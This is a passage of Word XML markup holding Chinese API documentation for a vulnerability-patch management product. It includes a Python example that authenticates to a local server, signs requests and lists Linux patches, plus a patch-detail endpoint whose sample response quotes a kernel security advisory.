          <w:p w14:paraId="50A8CD54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">是否存在进程影响 0/1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>无进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>影响/有进程影响(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 并且当前进程影响没有未知状态, 当主机没有进行进程影响扫描的时候, 都是</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>无进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>影响, 进程影响每天有定时执行, 所以安装主机后如果要立马知道是否补丁有进程影响, 需要先执行一次进程影响扫描, 或者等第二天定时执行后可以获得补丁是否有进程影响)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23FC15A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D75BE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">from __future__ import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>absolute_import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method="POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + info + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, "timestamp": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method=method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_linux_patch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>list?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page':0, 'size': 50}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_linux_patch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED2AD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc115166163"/>
      <w:bookmarkStart w:id="178" w:name="查询补丁详情"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询补丁详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="5D9090D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E110D5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A0498" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF1F53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F18067" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7D3AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5ab243407d761b1147bfb827</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E048AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1750CA80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>patchId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT012016000970",                      //补丁id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kbNum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,                                    //kb号，只有windows有</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bulletId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,                                 //公告号，只有windows有</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>patchName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "CentOS 6 : kernel (CESA-2016:0855)",  //补丁名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "severity": 2,                                      //危险程度</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>publishTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2016-05-16 00:00:00",               //补丁发布时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [                                          //影响的app</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "其他"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "An update for kernel is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>) :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> * It was found that reporting </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">emulation failures to user space could lead to either a local (CVE-2014-7842) or a L2-&gt;L1 (CVE-2010-5313) denial of service. In the case of a local denial of service, an attacker must have access to the MMIO area or be able to access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I/O port. Please note that on certain systems, HPET is mapped to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as part of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vdso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vvar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and thus an unprivileged user may generate MMIO transactions (and enter the emulator) this way. (CVE-2010-5313, CVE-2014-7842, Moderate) * It was found that the Linux kernel did not properly account file descriptors passed over the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
